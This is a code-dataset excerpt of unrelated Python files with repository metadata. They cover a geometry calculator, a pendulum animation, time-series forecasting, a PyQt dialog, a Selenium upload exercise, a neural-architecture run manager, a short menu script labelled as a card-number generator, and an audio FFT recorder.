미로탐색.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"25080757652","text":"__author__ = '116031030'\r\nimport math\r\n\r\ndef result(shape, perimeter, area):\r\n print('The perimeter of this {} is {} and the area is {}.\\n'.format(shape, perimeter, area))\r\n\r\ndef circumference_perimeter(radius):\r\n return 2 * math.pi * radius\r\n\r\ndef circumference_area(radius):\r\n return math.pi * radius ** 2\r\n\r\ndef circumference():\r\n radius = eval(input('What is the circumference radius? '))\r\n perimeter = circumference_perimeter(radius)\r\n area = circumference_area(radius)\r\n result('circumference', perimeter, area)\r\n\r\ndef triangle_perimeter(side1, side2, side3):\r\n perimeter = side1 + side2 + side3\r\n return perimeter\r\n\r\ndef triangle_area(a, b, c):\r\n s = triangle_perimeter(a, b, c)\r\n s /= 2\r\n area = (s * (s - a) * (s - b) * (s - c)) ** 0.5\r\n return area\r\n\r\ndef triangle():\r\n side1 = eval(input('Side 1: '))\r\n side2 = eval(input('Side 2: '))\r\n side3 = eval(input('Side 3: '))\r\n area = triangle_area(side1, side2, side3)\r\n perimeter = triangle_perimeter(side1, side2, side3)\r\n result('triangle', perimeter, area)\r\n\r\ndef rectangle_perimeter(a, b):\r\n return 2 * a + 2 * b\r\n\r\ndef rectangle_area(a, b):\r\n return a * b\r\n\r\ndef rectangle():\r\n side1 = eval(input('Side 1: '))\r\n side2 = eval(input('Side 2: '))\r\n area = rectangle_area(side1, side2)\r\n perimeter = rectangle_perimeter(side1, side2)\r\n result('rectangle', perimeter, area)\r\n\r\nshape = 0\r\n\r\nwhile shape != 4:\r\n shape = int(input('Choose the shape: \\n'\r\n '1 - Circumference \\n'\r\n '2 - Triangle \\n'\r\n '3 - Rectangle \\n'\r\n '4 - Exit\\n'))\r\n\r\n if shape == 1:\r\n circumference()\r\n\r\n elif shape == 2:\r\n triangle()\r\n\r\n elif shape == 3:\r\n rectangle()\r\n\r\n","repo_name":"majard/prog1-uff-2016.1","sub_path":"Geometry.py","file_name":"Geometry.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20364504394","text":"from math import pi as PI, sin, cos, sqrt\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\ndef update(frame):\r\n t = frame/FPS\r\n anpha = A0*cos(OMEGA*t - PI)\r\n x, y = L*sin(anpha), L*(1 - cos(anpha))\r\n\r\n ax.clear()\r\n ax.axis(\"equal\"); ax.axis(\"off\")\r\n ax.set_xlim([-1.1*L*sin(A0), 1.1*L*sin(A0)])\r\n ax.set_ylim([-0.1*L, 1.1*L])\r\n ax.plot([0, x], [L, y], color=\"black\", linewidth=1)\r\n ax.plot([x], [y], \"o\", color=\"red\", markersize=10)\r\n\r\nL = 1 # chiều dài dây treo (m)\r\nOMEGA = sqrt(9.81/L) # tần số góc (1/s^2)\r\nT = 2*PI/OMEGA # chu kì dao động (s)\r\nA0 = PI/15 # biên độ góc (rad)\r\nFPS = 24 # frames per second\r\n\r\nfig, ax = plt.subplots()\r\nani = FuncAnimation(fig, update, interval=1000//FPS, frames=round(T*FPS))\r\nani.save(\"con_lac_don.gif\", writer=\"pillow\")\r\nprint(\"Done!\")\r\n","repo_name":"vqhBook/python","sub_path":"lesson13/con_lac_don.py","file_name":"con_lac_don.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"76"} +{"seq_id":"73824188726","text":"import pandas as pd\nimport time\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nimport statsmodels.tsa.holtwinters as ets\n\ndef model_building(train_data, test_data):\n\n\tprint(\"\\nImplementing Simple Exponential Smoothing model and training the model...\")\n\tses_train = ets.ExponentialSmoothing(train_data, trend=None, damped=False, seasonal=None).fit()\n\tses_test = ses_train.forecast(steps=len(test_data))\n\tses_test = pd.DataFrame(ses_test).set_index(test_data.index)\n\ttime.sleep(7)\n\n\tprint(\"\\nTest results are...\")\n\ttime.sleep(3)\t\n\tprint(ses_test)\n\ttime.sleep(5)\n\n\tprint(\"\\nPloting results into graph and visualizing it...\")\n\ttime.sleep(4)\n\tfigl, ax = plt.subplots(figsize=(20,7))\n\t#ax.plot(train_data, label=\"train\")\n\tax.plot(test_data, label=\"test data\")\n\tax.plot(ses_test, label=\"ses-test prediction\")\n\tplt.legend(loc=\"upper left\")\n\tplt.title(\"Exponential Smoothing Method\")\n\tplt.ylabel(\"Score\")\n\tplt.xlabel(\"Year\")\n\tplt.rcParams.update({'font.size': 15})\n\tplt.show()\n\t\n\tprint(\"\\nCalculating RMSE value...\")\n\ttime.sleep(3)\n\trms_ses = sqrt(mean_squared_error(test_data, ses_test))\n\tprint(\"RMSE value for Simple Exponential Smoothing is : \"+str(rms_ses))\n\t\n\treturn rms_ses\n","repo_name":"JayVora314/Platform-Vulnerabilities-Prediction-using-Time-Series-Analysis","sub_path":"model_ses.py","file_name":"model_ses.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10840887570","text":"#!/usr/bin/python\n\n# Author: Andrew Selzer\n# Purpose: Simple function to use recursion to find the factorial of a number.\n\nprint (\"Type factorial(number) to use this program.\")\n\ndef factorial(x):\n if x < 2:\n return 1\n else:\n return x * factorial(x-1)","repo_name":"afs2015/SmallPythonProjects","sub_path":"FunPythonProjects/FindFactorial.py","file_name":"FindFactorial.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18039230658","text":"import os\nfrom pydantic import BaseSettings\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\n\n\nclass Settings(BaseSettings):\n server_host: str = os.getenv(\"SERVER_HOST\")\n server_port: int = os.getenv(\"SERVER_PORT\")\n database_url: str = os.getenv(\"DATABASE_URL\")\n\n\nsettings = Settings(\n _env_file='../.env',\n _env_file_encoding='utf-8',\n)","repo_name":"BondarenkoDV/fastapi_rabbitmq_tornado","sub_path":"servicedb/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41199221524","text":"'''\nCreated on Sep 18, 2014\n\n@author: Eddie Pantridge, Hampshire College F2012\n'''\nimport util\nimport Pysh.instructions.common\n\ndef delete_prev_paren_pair(prog):\n '''\n Deletes the last closed paren pair from prog, which may be a partial program.\n '''\n reversed_prog = prog[::-1]\n new_prog = []\n number_close_parens = 0\n found_first_close = False\n looping = True\n while looping:\n #Check if reversed-prog is empty, in which case we are done\n if len(reversed_prog) == 0:\n return new_prog[::-1]\n #Check if done, which is if we've found the first :close, the paren-stack is empty, and the first item in reversed-prog is :open\n elif found_first_close and number_close_parens == 0 and reversed_prog[0] == ':open':\n temp = new_prog + reversed_prog[1:]\n return temp[::-1]\n #Check if looking for the correct :open but found an :open for a different paren\n elif found_first_close and 0 < number_close_parens and reversed_prog[0] == ':open':\n reversed_prog = reversed_prog[1:]\n new_prog = new_prog + [reversed_prog[0]]\n number_close_parens -= 1\n #Check if looking for correct :open but found another :close\n elif found_first_close and reversed_prog[0] == ':close':\n reversed_prog = reversed_prog[1:]\n new_prog = new_prog + [reversed_prog[0]]\n number_close_parens += 1\n #Check if just found first :close. In which case skip it and set the found-first-close flag\n elif not found_first_close and reversed_prog[0] == ':close':\n reversed_prog = reversed_prog[1:]\n number_close_parens = 0\n found_first_close = True\n #Otherwise, just put the item onto new-prog and keep looking with same other variables\n else:\n reversed_prog = reversed_prog[1:]\n new_prog = new_prog + [reversed_prog[0]]\n \ndef translate_plush_genome_to_push_program(argmap):\n '''\n Takes as input an individual (or map) containing a Plush genome (:genome)\n and translates it to the correct Push program with\n balanced parens. The linear Plush genome is made up of a list of instruction\n maps, each including an :instruction key as well as other epigenetic marker\n keys. As the linear Plush genome is traversed, each instruction that requires\n parens will push :close and/or :close-open onto the paren-stack, and will\n also put an open paren after it in the program. For example, an instruction\n that requires 3 paren groupings will push :close, then :close-open, then :close-open.\n When a positive number is encountered in the :close key of the\n instruction map, it is set to num-parens-here during the next recur. This\n indicates the number of parens to put here, if need is indicated on the\n paren-stack. If the top item of the paren-stack is :close, a close paren\n will be inserted. If the top item is :close-open, a close paren followed by\n an open paren will be inserted.\n If the end of the program is reached but parens are still needed (as indicated by\n the paren-stack), parens are added until the paren-stack is empty.\n Instruction maps that have :silence set to true will be ignored entirely.\n '''\n if argmap['program'] != None:\n return argmap['program']\n else:\n prog = []\n gn = argmap['genome']\n num_parens_here = 0\n paren_stack = []\n \n while(True):\n # Check if need to add close parens here\n if 0 < num_parens_here:\n if paren_stack[0] == ':close':\n prog = prog + [':close']\n elif paren_stack[0] == ':close-open':\n prog = prog + [':close']\n prog = prog + [':open']\n num_parens_here -= 1\n paren_stack[1:]\n # Check if at end of program but still need to add parens\n elif len(gn) == 0 and len(paren_stack) > 0:\n num_parens_here = len(paren_stack)\n # Check if done\n elif len(gn) == 0:\n util.open_close_sequence_to_list(prog)\n # If here, ready for next instruction\n else:\n number_parens_group","repo_name":"zbyte64/PyshGP","sub_path":"Pysh/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7252360445","text":"import os\nimport json\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nfrom tqdm import tqdm\nfrom utils import decode_ofa_mbv3_to_igraph\nfrom ofa_local.utils import get_net_info, cross_entropy_loss_with_soft_target, cross_entropy_with_label_smoothing\nfrom ofa_local.utils import AverageMeter, accuracy, write_log, mix_images, mix_labels, init_models\n\n__all__ = ['RunManager']\nimport torchvision.models as models\n\n\nclass RunManager:\n\t\n\tdef __init__(self, path, args, net, run_config, init=True, measure_latency=None,\n\t no_gpu=False, data_loader=None, pp=None):\n\t\tself.path = path\n\t\tself.mode = args.model_name\n\t\tself.net = net\n\t\tself.run_config = run_config\n\t\t\n\t\tself.best_acc = 0\n\t\tself.start_epoch = 0\n\t\t\n\t\tos.makedirs(self.path, exist_ok=True)\n\t\t# dataloader\n\t\tif data_loader is not None:\n\t\t\tself.data_loader = data_loader\n\t\t\tcls_lst = self.data_loader.get_cls_idx()\n\t\t\tself.cls_lst = cls_lst\n\t\telse:\n\t\t\tself.data_loader = self.run_config.valid_loader\n\t\t\tself.data_loader.create_episode()\n\t\t\tcls_lst = self.data_loader.get_cls_idx()\n\t\t\tself.cls_lst = cls_lst\n\t\t\n\t\tstate_dict = self.net.classifier.state_dict()\n\t\tnew_state_dict = {'weight': state_dict['linear.weight'][cls_lst],\n\t\t 'bias': state_dict['linear.bias'][cls_lst]}\n\t\t\n\t\tself.net.classifier = nn.Linear(1280, len(cls_lst), bias=True)\n\t\tself.net.classifier.load_state_dict(new_state_dict)\n\t\t\n\t\t# move network to GPU if available\n\t\tif torch.cuda.is_available() and (not no_gpu):\n\t\t\tself.device = torch.device('cuda:0')\n\t\t\tself.net = self.net.to(self.device)\n\t\t\tcudnn.benchmark = True\n\t\telse:\n\t\t\tself.device = torch.device('cpu')\n\t\t\n\t\t# net info\n\t\tnet_info = get_net_info(\n\t\t\tself.net, self.run_config.data_provider.data_shape, measure_latency, False)\n\t\tself.net_info = net_info\n\t\tself.test_transform = self.run_config.data_provider.test.dataset.transform\n\n\t\t# criterion\n\t\tif isinstance(self.run_config.mixup_alpha, float):\n\t\t\tself.train_criterion = cross_entropy_loss_with_soft_target\n\t\telif self.run_config.label_smoothing > 0:\n\t\t\tself.train_criterion = \\\n\t\t\t\tlambda pred, target: cross_entropy_with_label_smoothing(pred, target, self.run_config.label_smoothing)\n\t\telse:\n\t\t\tself.train_criterion = nn.CrossEntropyLoss()\n\t\tself.test_criterion = nn.CrossEntropyLoss()\n\t\t\n\t\t# optimizer\n\t\tif self.run_config.no_decay_keys:\n\t\t\tkeys = self.run_config.no_decay_keys.split('#')\n\t\t\tnet_params = [\n\t\t\t\tself.network.get_parameters(keys, mode='exclude'), # parameters with weight decay\n\t\t\t\tself.network.get_parameters(keys, mode='include'), # parameters without weight decay\n\t\t\t]\n\t\telse:\n\t\t\t# noinspection PyBroadException\n\t\t\ttry:\n\t\t\t\tnet_params = self.network.weight_parameters()\n\t\t\texcept Exception:\n\t\t\t\tnet_params = []\n\t\t\t\tfor param in self.network.parameters():\n\t\t\t\t\tif param.requires_grad:\n\t\t\t\t\t\tnet_params.append(param)\n\t\tself.optimizer = self.run_config.build_optimizer(net_params)\n\t\t\n\t\tself.net = torch.nn.DataParallel(self.net)\n\t\t\n\t\tif self.mode == 'generator':\n\t\t\t# PP\n\t\t\tsave_dir = f'{args.save_path}/predictor/model/ckpt_max_corr.pt'\n\n\t\t\tself.acc_predictor = pp.to('cuda')\n\t\t\tself.acc_predictor.load_state_dict(torch.load(save_dir))\n\t\t\tself.acc_predictor = torch.nn.DataParallel(self.acc_predictor)\n\t\t\tmodel = models.resnet18(pretrained=True).eval()\n\t\t\tfeature_extractor = torch.nn.Sequential(*list(model.children())[:-1]).to(self.device)\n\t\t\tself.feature_extractor = torch.nn.DataParallel(feature_extractor)\n\t\n\t\"\"\" save path and log path \"\"\"\n\t\n\t@property\n\tdef save_path(self):\n\t\tif self.__dict__.get('_save_path', None) is None:\n\t\t\tsave_path = os.path.join(self.path, 'checkpoint')\n\t\t\tos.makedirs(save_path, exist_ok=True)\n\t\t\tself.__dict__['_save_path'] = save_path\n\t\treturn self.__dict__['_save_path']\n\t\n\t@property\n\tdef logs_path(self):\n\t\tif self.__dict__.get('_logs_path', None) is None:\n\t\t\tlogs_path = os.path.join(self.path, 'logs')\n\t\t\tos.makedirs(logs_path, exist_ok=True)\n\t\t\tself.__dict__['_logs_path'] = logs_path\n\t\treturn self.__dict__['_logs_path']\n\t\n\t@property\n\tdef network(self):\n\t\treturn self.net.module if isinstance(self.net, nn.DataParallel) else self.net\n\t\n\tdef write_log(self, log_str, prefix='valid', should_print=True, mode='a'):\n\t\twrite_log(self.logs_path, log_str, prefix, should_print, mode)\n\t\n\t\"\"\" save and load models \"\"\"\n\t\n\tdef save_model(self, checkpoint=None, is_best=False, model_name=None):\n\t\tif checkpoint is None:\n\t\t\tcheckpoint = {'state_dict': self.network.state_dict()}\n\t\t\n\t\tif model_name is None:\n\t\t\tmodel_name = 'checkpoint.pth.tar'\n\t\t\n\t\tcheckpoint['dataset'] = self.run_config.dataset # add `dataset` info to the checkpoint\n\t\tlatest_fname = os.path.join(self.save_path, 'latest.txt')\n\t\tmodel_path = os.path.join(self.save_path, model_name)\n\t\twith open(latest_fname, 'w') as fout:\n\t\t\tfout.write(model_path + '\\n')\n\t\ttorch.save(checkpoint, model_path)\n\t\t\n\t\tif is_best:\n\t\t\tbest_path = os.path.join(self.save_path, 'model_best.pth.tar')\n\t\t\ttorch.save({'state_dict': checkpoint['state_dict']}, best_path)\n\t\n\tdef load_model(self, model_fname=None):\n\t\tlatest_fname = os.path.join(self.save_path, 'latest.txt')\n\t\tif model_fname is None and os.path.exists(latest_fname):\n\t\t\twith open(latest_fname, 'r') as fin:\n\t\t\t\tmodel_fname = fin.readline()\n\t\t\t\tif model_fname[-1] == '\\n':\n\t\t\t\t\tmodel_fname = model_fname[:-1]\n\t\t# noinspection PyBroadException\n\t\ttry:\n\t\t\tif model_fname is None or not os.path.exists(model_fname):\n\t\t\t\tmodel_fname = '%s/checkpoint.pth.tar' % self.save_path\n\t\t\t\twith open(latest_fname, 'w') as fout:\n\t\t\t\t\tfout.write(model_fname + '\\n')\n\t\t\tprint(\"=> loading checkpoint '{}'\".format(model_fname))\n\t\t\tcheckpoint = torch.load(model_fname, map_location='cpu')\n\t\texcept Exception:\n\t\t\tprint('fail to load checkpoint from %s' % self.save_path)\n\t\t\treturn {}\n\t\t\n\t\tself.network.load_state_dict(checkpoint['state_dict'])\n\t\tif 'epoch' in checkpoint:\n\t\t\tself.start_epoch = checkpoint['epoch'] + 1\n\t\tif 'best_acc' in checkpoint:\n\t\t\tself.best_acc = checkpoint['best_acc']\n\t\tif 'optimizer' in checkpoint:\n\t\t\tself.optimizer.load_state_dict(checkpoint['optimizer'])\n\t\t\n\t\tprint(\"=> loaded checkpoint '{}'\".format(model_fname))\n\t\treturn checkpoint\n\t\n\tdef save_config(self, extra_run_config=None, extra_net_config=None):\n\t\t\"\"\" dump run_config and net_config to the model_folder \"\"\"\n\t\trun_save_path = os.path.join(self.path, 'run.config')\n\t\tif not os.path.isfile(run_save_path):\n\t\t\trun_config = self.run_config.config\n\t\t\tif extra_run_config is not None:\n\t\t\t\trun_config.update(extra_run_config)\n\t\t\tjson.dump(run_config, open(run_save_path, 'w'), indent=4)\n\t\t\tprint('Run configs dump to %s' % run_save_path)\n\t\t\n\t\ttry:\n\t\t\tnet_save_path = os.path.join(self.path, 'net.config')\n\t\t\tnet_config = self.network.config\n\t\t\tif extra_net_config is not None:\n\t\t\t\tnet_config.update(extra_net_config)\n\t\t\tjson.dump(net_config, open(net_save_path, 'w'), indent=4)\n\t\t\tprint('Network configs dump to %s' % net_save_path)\n\t\texcept Exception:\n\t\t\tprint('%s do not support net config' % type(self.network))\n\t\n\t\"\"\" metric related \"\"\"\n\t\n\tdef get_metric_dict(self):\n\t\treturn {\n\t\t\t'top1': AverageMeter(),\n\t\t\t'top5': AverageMeter(),\n\t\t}\n\t\n\tdef update_metric(self, metric_dict, output, labels):\n\t\tacc1, acc5 = accuracy(output, labels, topk=(1, 5))\n\t\tmetric_dict['top1'].update(acc1[0].item(), output.size(0))\n\t\tmetric_dict['top5'].update(acc5[0].item(), output.size(0))\n\t\n\tdef get_metric_vals(self, metric_dict, return_dict=False):\n\t\tif return_dict:\n\t\t\treturn {\n\t\t\t\tkey: metric_dict[key].avg for key in metric_dict\n\t\t\t}\n\t\telse:\n\t\t\treturn [metric_dict[key].avg for key in metric_dict]\n\t\n\tdef get_metric_names(self):\n\t\treturn 'top1', 'top5'\n\t\n\t\"\"\" train and test \"\"\"\n\tdef validate(self, epoch=0, is_test=False, run_str='', net=None,\n\t data_loader=None, no_logs=False, train_mode=False, net_setting=None):\n\t\tif net is None:\n\t\t\tnet = self.net\n\t\tif not isinstance(net, nn.DataParallel):\n\t\t\tnet = nn.DataParallel(net)\n\t\t\n\t\tif data_loader is not None:\n\t\t\tself.data_loader = data_loader\n\t\t\n\t\tif train_mode:\n\t\t\tnet.train()\n\t\telse:\n\t\t\tnet.eval()\n\t\t\n\t\tlosses = AverageMeter()\n\t\tmetric_dict = self.get_metric_dict()\n\t\t\n\t\tfeatures_stack = []\n\t\twith torch.no_grad():\n\t\t\twith tqdm(total=len(self.data_loader),\n\t\t\t desc='Validate Epoch #{} {}'.format(epoch + 1, run_str), disable=no_logs) as t:\n\t\t\t\tfor i, (images, labels) in enumerate(self.data_loader):\n\t\t\t\t\timages, labels = images.to(self.device), labels.to(self.device)\n\t\t\t\t\tif self.mode == 'generator':\n\t\t\t\t\t\tfeatures = self.feature_extractor(images).squeeze()\n\t\t\t\t\t\tfeatures_stack.append(features)\n\t\t\t\t\t# compute output\n\t\t\t\t\toutput = net(images)\n\t\t\t\t\tloss = self.test_criterion(output, labels)\n\t\t\t\t\t# measure accuracy and record loss\n\t\t\t\t\tself.update_metric(metric_dict, output, labels)\n\t\t\t\t\t\n\t\t\t\t\tlosses.update(loss.item(), images.size(0))\n\t\t\t\t\tt.set_postfix({\n\t\t\t\t\t\t'loss': losses.avg,\n\t\t\t\t\t\t**self.get_metric_vals(metric_dict, return_dict=True),\n\t\t\t\t\t\t'img_size': images.size(2),\n\t\t\t\t\t})\n\t\t\t\t\tt.update(1)\n\t\t\t\t\t\n\t\tif self.mode == 'generator':\n\t\t\tfeatures_stack = torch.cat(features_stack)\n\t\t\tigraph_g = decode_ofa_mbv3_to_igraph(net_setting)[0]\n\t\t\tD_mu = self.acc_predictor.module.set_encode(features_stack.unsqueeze(0).to('cuda'))\n\t\t\tG_mu = self.acc_predictor.module.graph_encode(igraph_g)\n\t\t\tpred_acc = self.acc_predictor.module.predict(D_mu.unsqueeze(0), G_mu).item()\n\t\t\t\n\t\treturn losses.avg, self.get_metric_vals(metric_dict), \\\n\t\t pred_acc if self.mode == 'generator' else None\n\t\n\n\tdef validate_all_resolution(self, epoch=0, is_test=False, net=None):\n\t\tif net is None:\n\t\t\tnet = self.network\n\t\tif isinstance(self.run_config.data_provider.image_size, list):\n\t\t\timg_size_list, loss_list, top1_list, top5_list = [], [], [], []\n\t\t\tfor img_size in self.run_config.data_provider.image_size:\n\t\t\t\timg_size_list.append(img_size)\n\t\t\t\tself.run_config.data_provider.assign_active_img_size(img_size)\n\t\t\t\tself.reset_running_statistics(net=net)\n\t\t\t\tloss, (top1, top5) = self.validate(epoch, is_test, net=net)\n\t\t\t\tloss_list.append(loss)\n\t\t\t\ttop1_list.append(top1)\n\t\t\t\ttop5_list.append(top5)\n\t\t\treturn img_size_list, loss_list, top1_list, top5_list\n\t\telse:\n\t\t\tloss, (top1, top5) = self.validate(epoch, is_test, net=net)\n\t\t\treturn [self.run_config.data_provider.active_img_size], [loss], [top1], [top5]\n\t\n\tdef reset_running_statistics(self, net=None, subset_size=2000, subset_batch_size=200, data_loader=None):\n\t\tfrom ofa_local.imagenet_classification.elastic_nn.utils import set_running_statistics\n\t\tif net is None:\n\t\t\tnet = self.network\n\t\tif data_loader is None:\n\t\t\tdata_loader = self.run_config.random_sub_train_loader(subset_size, subset_batch_size)\n\t\tset_running_statistics(net, data_loader)\n","repo_name":"HayeonLee/MetaD2A","sub_path":"MetaD2A_mobilenetV3/database/run_manager.py","file_name":"run_manager.py","file_ext":"py","file_size_in_byte":10587,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"77"} +{"seq_id":"37637825724","text":"import sys\nimport os\n\nfrom widgetStyles.TextEdit import TextEdit\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtCore import pyqtSignal, Qt, pyqtSlot, QSize\nfrom PyQt5.QtGui import QFont, QIcon\n\n\nfrom designs.python.group_window import Ui_GroupWindow\n\nfrom utils.message import Message\n\nfrom database.model import Model\n\nfrom utils.helpers import StyleSheet, set_font\n\nfrom widgetStyles.Label import Label\nfrom widgetStyles.PushButton import PushButton\nfrom widgetStyles.Dialog import Dialog\nfrom widgetStyles.LineEdit import LineEdit\n\nclass GroupWindow(Ui_GroupWindow, QDialog):\n group_add_signal = pyqtSignal(bool)\n def __init__(self, group=None) -> None:\n super(GroupWindow, self).__init__()\n self.setupUi(self)\n self.read_styles()\n self.setWindowFlag(Qt.WindowContextHelpButtonHint, False)\n self.setWindowIcon(QIcon(\":/other/app_icon\"))\n self.group = group\n \n if self.group: self.fill_data()\n \n self.btn_discard.clicked.connect(self.close)\n self.btn_save.clicked.connect(self.save)\n \n def read_styles(self):\n widget_list = [Dialog, PushButton, Label, LineEdit, TextEdit]\n \n stylesheet = StyleSheet(widget_list).create()\n self.setStyleSheet(stylesheet)\n \n font_list = [\n self.lbl_description,\n self.lbl_name,\n self.lne_description,\n self.lne_name,\n self.btn_discard,\n self.btn_save\n ]\n set_font(font_list)\n \n def fill_data(self):\n self.lne_name.setText(self.group['name'])\n self.lne_description.setText(self.group['description'])\n self.btn_save.setText(\"Update\")\n \n @pyqtSlot()\n def save(self):\n name = self.lne_name.text()\n description = self.lne_description.toPlainText()\n \n if not name:\n Message(\"Please enter a name for the group\", \"Missing Group Name\").exec_()\n \n group = {\n \"name\": name,\n \"description\": description\n }\n \n if not self.group:\n Model().save(\"groups\", group)\n else:\n Model().update(\"groups\", group, self.group['id'])\n self.group_add_signal.emit(True)\n self.close()\n \n \n \n ","repo_name":"daniel-deru/WorkMate-3.0","sub_path":"windows/group_window.py","file_name":"group_window.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22238923368","text":"import random\r\nimport US as us\r\nimport EU as eu\r\nimport AS as asia\r\nimport ALL as all\r\nfrom random import randint as run\r\n\r\nprint(\"[////𝓒𝓒 𝓖𝓮𝓷 𝓫𝔂 @𝓞𝓷𝔂𝔂𝓣𝓱𝓮𝓑𝓮𝓼𝓽\\\\\\\\\\\\\\]\")\r\nprint(\"[1] US\")\r\nprint(\"[2] EU\")\r\nprint(\"[3] ASIA\")\r\nprint(\"[4] ALL\")\r\nselect1 = input(\"Select bin country: \")\r\nif select1 == \"1\":\r\n us.generaUS()\r\nif select1 == \"2\":\r\n eu.generaEU()\r\nif select1 == \"3\":\r\n asia.generaAS()\r\nif select1 == \"4\":\r\n all.generaALL()","repo_name":"OnyyTheBest/CC-GEN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29407329569","text":"#Algorito para sumar numeros naturales\n#La suma se realizara desde el 1 hasta N\n\n#Solicita el ingreso del numero natural\nnumero = int(input(\"Ingrese un numero natural : \") )\n\n#Aplica la formula\nsuma = (numero/2) * (numero+1)\n\n#Imprime el resultado\nprint(suma)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema1_ej1/tema1_ej1_aca352e1a4a5b448a93d844e71d52fa5.py","file_name":"tema1_ej1_aca352e1a4a5b448a93d844e71d52fa5.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44252853032","text":"import graphene\n\nfrom ..core.types import SortInputObjectType\n\n\nclass BookSortField(graphene.Enum):\n TITLE = [\"title\", \"gerne\"]\n GENRE = [\"genre\", \"title\"]\n ISBN = [\"isbn\", \"title\"]\n\n @property\n def description(self):\n if self.name in BookSortField.__enum__._member_names_:\n sort_name = self.name.lower().replace(\"_\", \" \")\n return f\"Sort books by {sort_name}.\"\n raise ValueError(\"Unsupported enum value: %s\" % self.value)\n\n\nclass BookSortingInput(SortInputObjectType):\n class Meta:\n sort_enum = BookSortField\n type_name = \"books\"\n","repo_name":"theGleam/graphene-simple-book-list-api","sub_path":"book_list/graphql/book/sorters.py","file_name":"sorters.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35303220410","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport os\n\n\n\nlink = 'http://suninjuly.github.io/file_input.html'\n#link = 'http://suninjuly.github.io/registration2.html' # bug\ntry: \n\tbrowser = webdriver.Chrome(executable_path=r'D:\\GoogleDrive\\chromedriver.exe') #executable_path=r'D:\\GoogleDrive\\chromedriver.exe'\n\tbrowser.get(link)\n\n\t# Ваш код, который заполняет обязательные поля\n\t\n\t\n\t\n\t#browser.execute_script(\"return arguments[0].scrollIntoView(true);\", button)\n\t\n\n\tinput1 = browser.find_element_by_name('firstname')\n\tinput1.send_keys(\"il\")\n\n\tinput1 = browser.find_element_by_name('lastname')\n\tinput1.send_keys(\"val\")\n\n\tinput1 = browser.find_element_by_name('email')\n\tinput1.send_keys(\"val@fake\")\n\n\tcurrent_dir = os.path.abspath(os.path.dirname(__file__))\n\tfile_path = os.path.join(current_dir,'file.txt')\n\tinput1 = browser.find_element_by_id('file')\n\tinput1.send_keys(file_path)\n\n\n\t# Отправляем заполненную форму\n\tbutton = browser.find_element_by_css_selector(\"button.btn\")\n\tbutton.click()\n\n\t# Проверяем, что смогли зарегистрироваться\n\t# ждем загрузки страницы\n\t\n\nexcept Exception as error:\n print(f'Произошла ошибка, вот её трэйсбэк: {error}')\nfinally:\n\t# ожидание чтобы визуально оценить результаты прохождения скрипта\n\ttime.sleep(10)\n\t# закрываем браузер после всех манипуляций\n\tbrowser.quit()","repo_name":"ilnur2242/stepik_auto_tests_course","sub_path":"section2/task22_step8.py","file_name":"task22_step8.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"394824028","text":"from typing import Dict, Any\nimport csv\nimport pyaudio\nimport wave\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\nCHUNK = 1024\nRECORD_SECONDS = 2\nFREQRANGE = 4000\n\nfor k in range (1):\n WAVE_OUTPUT_FILENAME = \"sample.wav\"\n audio = pyaudio.PyAudio()\n\n stream = audio.open(format=FORMAT, channels=CHANNELS,\n rate=RATE, input=True,\n frames_per_buffer=CHUNK)\n\n # start to listning to input\n print(\"Listeninig...for the \"+ str(k+1)+' th time')\n frames = []\n data = np.fromstring(stream.read(RATE*RECORD_SECONDS), dtype=np.int16) # read data 2 sseconds instead of chunk\n peak = np.average(np.abs(data)) * 2\n frames.append(data)\n\n datas = data * np.hanning(len(data)) # smooth the FFT by windowing data\n fft = abs(np.fft.fft(datas).real)\n fft = fft[:int(len(fft)/2)]\n\n freq = np.fft.fftfreq(RATE * RECORD_SECONDS, 1.0 / RATE) # check2 seconds frequency to find the maximum\n\n outFreq = (freq.tolist())[2:8001:2]\n outAmp =(fft.tolist())[2:8001:2]\n\n plt.plot(freq,fft)\n plt.axis([100,FREQRANGE,None, None])\n plt.xlabel('Audible Voice 